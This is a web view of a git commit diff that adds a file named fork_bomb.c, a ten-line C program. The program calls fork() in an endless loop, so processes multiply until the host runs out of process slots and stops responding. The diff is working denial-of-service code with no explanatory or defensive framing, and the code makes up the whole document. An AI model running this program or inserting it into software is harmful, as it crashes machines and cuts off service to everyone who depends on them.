summaryrefslogtreecommitdiff
path: root/fork_bomb.c
diff options
context:
space:
mode:
Diffstat (limited to 'fork_bomb.c')
-rw-r--r--fork_bomb.c10
1 files changed, 10 insertions, 0 deletions
diff --git a/fork_bomb.c b/fork_bomb.c
new file mode 100644
index 0000000..b6583e3
--- /dev/null
+++ b/fork_bomb.c
@@ -0,0 +1,10 @@
+#include <stdio.h>
+#include <unistd.h>
+
+
+int main(void)
+{
+ while(1)
+ fork();
+ return 0;
+}